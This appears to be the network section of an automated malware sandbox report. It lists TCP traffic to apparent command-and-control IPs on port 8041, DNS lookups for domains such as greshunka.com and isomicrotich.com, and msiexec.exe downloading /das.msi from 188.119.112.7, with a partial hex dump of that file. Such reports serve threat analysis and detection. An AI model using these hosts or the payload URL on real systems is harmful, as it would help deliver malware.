                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:39.728844881 CEST500398041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:39.734062910 CEST80415003980.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:40.425404072 CEST80415003980.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:40.425461054 CEST500398041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:40.425839901 CEST500398041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:40.426294088 CEST500408041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:40.426575899 CEST80415003980.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:40.426624060 CEST500398041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:40.432034016 CEST80415003980.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:40.432049036 CEST80415004080.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:40.432115078 CEST500408041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:40.536468029 CEST500408041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:40.541430950 CEST80415004080.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:41.075792074 CEST80415004080.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:41.075957060 CEST500408041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:41.081377029 CEST80415004080.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:41.082694054 CEST500408041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:41.086256981 CEST500408041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:41.091362000 CEST80415004080.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:41.123507023 CEST500418041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:41.129108906 CEST80415004180.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:41.129184961 CEST500418041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:41.129358053 CEST500418041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:41.135302067 CEST80415004180.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:41.135370970 CEST500418041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:45.197978973 CEST500428041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:45.203113079 CEST80415004280.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:45.205692053 CEST500428041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:45.205692053 CEST500428041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:45.210783958 CEST80415004280.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:45.837219000 CEST80415004280.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:45.837371111 CEST80415004280.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:45.838928938 CEST500428041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:45.838928938 CEST500428041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:45.841341019 CEST500438041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:45.843904972 CEST80415004280.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:45.846290112 CEST80415004380.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:45.849656105 CEST500438041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:45.849656105 CEST500438041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:45.854600906 CEST80415004380.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:46.490183115 CEST80415004380.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:46.490248919 CEST80415004380.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:46.490262032 CEST500438041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:46.490313053 CEST500438041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:46.500797987 CEST500438041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:46.503746033 CEST500448041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:46.505625010 CEST80415004380.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:46.508923054 CEST80415004480.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:46.508992910 CEST500448041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:46.510118961 CEST500448041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:46.515151978 CEST80415004480.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:46.515208006 CEST500448041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:51.655105114 CEST500458041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:51.660111904 CEST80415004582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:51.667089939 CEST500458041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:51.691086054 CEST500458041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:51.700617075 CEST80415004582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:52.271799088 CEST80415004582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:52.271861076 CEST500458041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:52.272480965 CEST500458041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:52.277333975 CEST80415004582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:52.323453903 CEST500458041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:52.328881979 CEST80415004582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:52.328943014 CEST500458041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:56.576487064 CEST500468041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:56.581406116 CEST80415004682.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:56.581556082 CEST500468041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:56.589694023 CEST500468041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:56.594912052 CEST80415004682.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:57.196603060 CEST80415004682.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:57.196741104 CEST500468041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:57.197279930 CEST500468041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:57.198812008 CEST500468041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:57.202159882 CEST80415004682.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:57.203917027 CEST80415004682.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:57.204839945 CEST500468041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:01.477157116 CEST500478041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:01.483084917 CEST80415004782.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:01.487195015 CEST500478041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:01.489126921 CEST500478041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:01.495163918 CEST80415004782.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:02.152379990 CEST80415004782.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:02.152457952 CEST500478041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:02.192717075 CEST500478041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:02.197789907 CEST80415004782.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:02.234534979 CEST500478041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:02.240072966 CEST80415004782.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:02.240140915 CEST500478041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:04.491369963 CEST50048443192.168.2.5188.114.96.3
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:04.491406918 CEST44350048188.114.96.3192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:04.491463900 CEST50048443192.168.2.5188.114.96.3
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:04.491955042 CEST50048443192.168.2.5188.114.96.3
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:04.491966963 CEST44350048188.114.96.3192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:04.969007015 CEST44350048188.114.96.3192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:04.969082117 CEST50048443192.168.2.5188.114.96.3
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:05.183135033 CEST50048443192.168.2.5188.114.96.3
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:05.183156967 CEST44350048188.114.96.3192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:05.184166908 CEST44350048188.114.96.3192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:05.184252024 CEST50048443192.168.2.5188.114.96.3
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:05.187136889 CEST50048443192.168.2.5188.114.96.3
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:05.231395006 CEST44350048188.114.96.3192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:05.718070984 CEST500498041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:06.205888987 CEST80415004982.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:06.205997944 CEST500498041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:06.206449986 CEST500498041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:06.211317062 CEST80415004982.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:06.625583887 CEST44350048188.114.96.3192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:06.625679016 CEST50048443192.168.2.5188.114.96.3
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:06.625691891 CEST44350048188.114.96.3192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:06.625749111 CEST44350048188.114.96.3192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:06.625750065 CEST50048443192.168.2.5188.114.96.3
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:06.625812054 CEST50048443192.168.2.5188.114.96.3
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:06.628954887 CEST50048443192.168.2.5188.114.96.3
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:06.628973961 CEST44350048188.114.96.3192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:06.961210012 CEST80415004982.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:06.961277008 CEST500498041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:06.961850882 CEST500498041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:06.964040995 CEST500498041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:06.967788935 CEST80415004982.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:06.973247051 CEST80415004982.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:06.973315001 CEST500498041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:07.943624020 CEST50050443192.168.2.5188.114.96.3
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:07.943718910 CEST44350050188.114.96.3192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:07.943808079 CEST50050443192.168.2.5188.114.96.3
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:07.944484949 CEST50050443192.168.2.5188.114.96.3
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:07.944521904 CEST44350050188.114.96.3192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:08.419292927 CEST44350050188.114.96.3192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:08.419441938 CEST50050443192.168.2.5188.114.96.3
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:08.420170069 CEST50050443192.168.2.5188.114.96.3
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:08.420200109 CEST44350050188.114.96.3192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:08.421840906 CEST50050443192.168.2.5188.114.96.3
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:08.421854019 CEST44350050188.114.96.3192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:08.857695103 CEST44350050188.114.96.3192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:08.857763052 CEST50050443192.168.2.5188.114.96.3
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:08.857772112 CEST44350050188.114.96.3192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:08.857826948 CEST50050443192.168.2.5188.114.96.3
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:08.860697985 CEST50050443192.168.2.5188.114.96.3
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:08.860724926 CEST44350050188.114.96.3192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:09.153625011 CEST50051443192.168.2.5188.114.96.3
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:09.153670073 CEST44350051188.114.96.3192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:09.154134989 CEST50051443192.168.2.5188.114.96.3
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:09.154134989 CEST50051443192.168.2.5188.114.96.3
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:09.154170990 CEST44350051188.114.96.3192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:09.629378080 CEST44350051188.114.96.3192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:09.629936934 CEST50051443192.168.2.5188.114.96.3
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:09.630279064 CEST50051443192.168.2.5188.114.96.3
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:09.630285978 CEST44350051188.114.96.3192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:09.634059906 CEST50051443192.168.2.5188.114.96.3
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:09.634068012 CEST44350051188.114.96.3192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:10.059154987 CEST500528041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:10.064202070 CEST80415005280.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:10.064502001 CEST500528041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:10.064855099 CEST500528041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:10.069681883 CEST80415005280.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:10.117194891 CEST44350051188.114.96.3192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:10.117257118 CEST50051443192.168.2.5188.114.96.3
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:10.117265940 CEST44350051188.114.96.3192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:10.117304087 CEST50051443192.168.2.5188.114.96.3
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:10.117337942 CEST44350051188.114.96.3192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:10.117392063 CEST50051443192.168.2.5188.114.96.3
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:10.122457027 CEST50051443192.168.2.5188.114.96.3
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:10.122467041 CEST44350051188.114.96.3192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:10.291878939 CEST50053443192.168.2.5188.114.96.3
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:10.291930914 CEST44350053188.114.96.3192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:10.291996956 CEST50053443192.168.2.5188.114.96.3
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:10.292339087 CEST50053443192.168.2.5188.114.96.3
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:10.292356968 CEST44350053188.114.96.3192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:10.707431078 CEST80415005280.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:10.707469940 CEST80415005280.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:10.707532883 CEST500528041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:10.707598925 CEST500528041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:10.793951988 CEST500528041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:10.799170971 CEST80415005280.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:11.054753065 CEST44350053188.114.96.3192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:11.054825068 CEST50053443192.168.2.5188.114.96.3
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:14.040616035 CEST50053443192.168.2.5188.114.96.3
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:14.040658951 CEST44350053188.114.96.3192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:14.041630030 CEST50053443192.168.2.5188.114.96.3
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:14.041636944 CEST44350053188.114.96.3192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:14.824388981 CEST44350053188.114.96.3192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:14.824453115 CEST50053443192.168.2.5188.114.96.3
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:14.824474096 CEST44350053188.114.96.3192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:14.824526072 CEST50053443192.168.2.5188.114.96.3
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:14.824712038 CEST50053443192.168.2.5188.114.96.3
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:14.824736118 CEST44350053188.114.96.3192.168.2.5

                                                                                                                                                                                                                                                    UDP Packets

                                                                                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:08.096319914 CEST4956453192.168.2.51.1.1.1
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:08.133663893 CEST53495641.1.1.1192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:14.574228048 CEST5475753192.168.2.51.1.1.1
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:14.867283106 CEST53547571.1.1.1192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:15.965694904 CEST5041253192.168.2.51.1.1.1
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:16.026420116 CEST53504121.1.1.1192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:50.584429979 CEST5212453192.168.2.51.1.1.1
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:51.571141005 CEST5212453192.168.2.51.1.1.1
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:51.652750015 CEST53521241.1.1.1192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:51.652797937 CEST53521241.1.1.1192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:56.422113895 CEST5026653192.168.2.51.1.1.1
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:56.571904898 CEST53502661.1.1.1192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:01.321063995 CEST5946853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:01.472044945 CEST53594681.1.1.1192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:04.470434904 CEST5589453192.168.2.51.1.1.1
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:04.490319014 CEST53558941.1.1.1192.168.2.5

                                                                                                                                                                                                                                                    DNS Queries

                                                                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:08.096319914 CEST192.168.2.51.1.1.10x8b3cStandard query (0)bazarunet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:14.574228048 CEST192.168.2.51.1.1.10x1cc4Standard query (0)greshunka.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:15.965694904 CEST192.168.2.51.1.1.10x1a6cStandard query (0)tiguanin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:50.584429979 CEST192.168.2.51.1.1.10xd639Standard query (0)greshunka.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:51.571141005 CEST192.168.2.51.1.1.10xd639Standard query (0)greshunka.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:56.422113895 CEST192.168.2.51.1.1.10x402dStandard query (0)greshunka.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:01.321063995 CEST192.168.2.51.1.1.10x7a59Standard query (0)greshunka.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:04.470434904 CEST192.168.2.51.1.1.10xfaecStandard query (0)isomicrotich.comA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                    DNS Answers

                                                                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:08.133663893 CEST1.1.1.1192.168.2.50x8b3cNo error (0)bazarunet.com80.78.24.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:14.867283106 CEST1.1.1.1192.168.2.50x1cc4No error (0)greshunka.com82.115.223.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:16.026420116 CEST1.1.1.1192.168.2.50x1a6cNo error (0)tiguanin.com80.78.24.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:51.652750015 CEST1.1.1.1192.168.2.50xd639No error (0)greshunka.com82.115.223.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:51.652797937 CEST1.1.1.1192.168.2.50xd639No error (0)greshunka.com82.115.223.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:56.571904898 CEST1.1.1.1192.168.2.50x402dNo error (0)greshunka.com82.115.223.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:01.472044945 CEST1.1.1.1192.168.2.50x7a59No error (0)greshunka.com82.115.223.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:04.490319014 CEST1.1.1.1192.168.2.50xfaecNo error (0)isomicrotich.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:04.490319014 CEST1.1.1.1192.168.2.50xfaecNo error (0)isomicrotich.com188.114.97.3A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                    HTTP Request Dependency Graph

                                                                                                                                                                                                                                                    • isomicrotich.com
                                                                                                                                                                                                                                                    • 188.119.112.7

                                                                                                                                                                                                                                                    HTTP Packets

                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    0192.168.2.549704188.119.112.780768C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:00.974850893 CEST114OUTGET /das.msi HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    User-Agent: Windows Installer
                                                                                                                                                                                                                                                    Host: 188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.586335897 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Thu, 03 Oct 2024 18:42:01 GMT
                                                                                                                                                                                                                                                    Server: Apache/2.4.58 (Ubuntu)
                                                                                                                                                                                                                                                    Last-Modified: Wed, 02 Oct 2024 15:58:58 GMT
                                                                                                                                                                                                                                                    ETag: "197800-6238084057480"
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    Content-Length: 1669120
                                                                                                                                                                                                                                                    Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Content-Type: application/x-msi
                                                                                                                                                                                                                                                    Data Raw: d0 cf 11 e0 a1 b1 1a e1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3e 00 03 00 fe ff 09 00 06 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 01 00 00 00 00 00 00 00 00 10 00 00 03 00 00 00 05 00 00 00 fe ff ff ff 00 00 00 00 00 00 00 00 45 00 00 00 cf 00 00 00 61 01 00 00 d3 01 00 00 d4 01 00 00 d5 01 00 00 d6 01 00 00 d7 01 00 00 d8 01 00 00 e6 04 00 00 28 05 00 00 29 05 00 00 2a 05 00 00 2b 05 00 00 2c 05 00 00 2d 05 00 00 2e 05 00 00 08 00 00 00 41 09 00 00 42 09 00 00 43 09 00 00 44 09 00 00 45 09 00 00 46 09 00 00 47 09 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: >Ea()*+,-.ABCDEFG<!3 +"#$%&'()*1,-./042;?56789:=>@ABCDGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghij
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.586365938 CEST1236INData Raw: 6b 00 00 00 6c 00 00 00 6d 00 00 00 6e 00 00 00 6f 00 00 00 70 00 00 00 71 00 00 00 72 00 00 00 73 00 00 00 74 00 00 00 75 00 00 00 76 00 00 00 77 00 00 00 78 00 00 00 79 00 00 00 7a 00 00 00 7b 00 00 00 7c 00 00 00 7d 00 00 00 7e 00 00 00 7f 00
                                                                                                                                                                                                                                                    Data Ascii: klmnopqrstuvwxyz{|}~Root EntryFSummaryInform
